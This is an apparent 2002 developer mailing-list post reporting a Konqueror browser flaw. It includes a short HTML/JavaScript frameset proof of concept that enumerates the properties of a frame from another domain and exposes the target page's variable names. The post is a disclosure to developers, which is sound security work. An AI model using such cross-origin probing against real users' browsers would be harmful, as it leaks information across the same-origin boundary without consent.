JS security and enumerating a Window
Koos Vriezen
koos.vriezen at xs4all.nl
Thu Oct 24 21:12:44 BST 2002
Hi,
While being a bit nervious about Dirk's hmm, I found that I can enumerate
a Window of another domain:
<HTML><HEAD><SCRIPT>
function doIt() {
myframe1.document.open();
myframe1.document.write("<html><body>");
for(var i in frames[1]) {
try{
myframe1.document.write(i + "=" + frames[1][i] + "<br>");
} catch(e) {
myframe1.document.write(i + " error<br>");
}
}
myframe1.document.write("</body></html>");
myframe1.document.close();
}
</SCRIPT> </HEAD>
<FRAMESET ROWS="300,*" onLoad="doIt()">
<FRAME NAME="myframe1" SRC="about:blank">
<FRAME NAME="myframe2" SRC="http://localhost/~koos/test.html">
</FRAMESET></HTML>
where test.html is:
<html><head><script>
var foo="bar";
</script></head>
<body></body></html>
Document opened with konq's filemanager, domain file:/.... As is myframe1.
And myframe2 has domain http://localhost/.
Does give a lot of 'WARNING: Javascript: access denied for current
frame...', but I can see JS variable name 'foo'. Don't see the value of it
though.
Koos
More information about the kfm-devel
mailing list